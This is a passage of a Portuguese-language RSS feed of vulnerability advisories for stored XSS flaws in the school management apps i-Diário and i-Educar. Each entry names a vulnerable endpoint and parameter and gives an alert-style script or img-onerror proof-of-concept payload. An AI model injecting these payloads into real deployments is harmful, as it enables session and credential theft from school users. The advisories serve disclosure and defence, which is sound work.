class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8919/image.png&amp;#34;
	width=&amp;#34;1366&amp;#34;
	height=&amp;#34;573&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8919/image_hu_61d6058a52e37131.png 480w, /p/cve-2025-8919/image_hu_29fd42848aa4238f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;572px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8919.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Fernanda Martins&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 13 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8920</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8920/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8920/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8920-cross-site-scripting-xss-armazenado-no-endpoint-dicionario-de-termos-bncc-parâmetro-planos-de-ensino&amp;#34;&amp;gt;CVE-2025-8920: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;//dicionario-de-termos-bncc&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8920-cross-site-scripting-xss-armazenado-no-endpoint-dicionario-de-termos-bncc-parâmetro-planos-de-ensino&amp;#34;&amp;gt;CVE-2025-8920: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8920&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;//dicionario-de-termos-bncc&amp;lt;/code&amp;gt; do aplicativo i-Diário. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/dicionario-de-termos-bncc&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Planos de ensino&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8920/image.png&amp;#34;
	width=&amp;#34;1361&amp;#34;
	height=&amp;#34;575&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8920/image_hu_b700522c20e08035.png 480w, /p/cve-2025-8920/image_hu_b173c6ab2683ec99.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;236&amp;#34;
		data-flex-basis=&amp;#34;568px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8920/image-1.png&amp;#34;
	width=&amp;#34;1366&amp;#34;
	height=&amp;#34;523&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8920/image-1_hu_697984d0ff1c654e.png 480w, /p/cve-2025-8920/image-1_hu_26a8359046aafdd9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;626px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-diario/CVE-2025-8920.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/f%C3%AAmartins/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Fernanda Martins&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 13 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8786</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8786/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8786/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8786-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8786: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8786-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-areas-de-conhecimentoid&amp;#34;&amp;gt;CVE-2025-8786: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8786&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/registros-de-conteudos-por-areas-de-conhecimento/[ID]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;Registro de atividades&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;Conteúdos&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8786/image.png&amp;#34;
	width=&amp;#34;1243&amp;#34;
	height=&amp;#34;915&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8786/image_hu_3e27598d3abe3ea1.png 480w, /p/cve-2025-8786/image_hu_bce7c67fb3add2c9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;135&amp;#34;
		data-flex-basis=&amp;#34;326px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8787</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8787/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8787/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8787-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-registros-de-conteudos-por-disciplinaid&amp;#34;&amp;gt;CVE-2025-8787: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;/registros-de-conteudos-por-disciplina/[ID]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8787&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
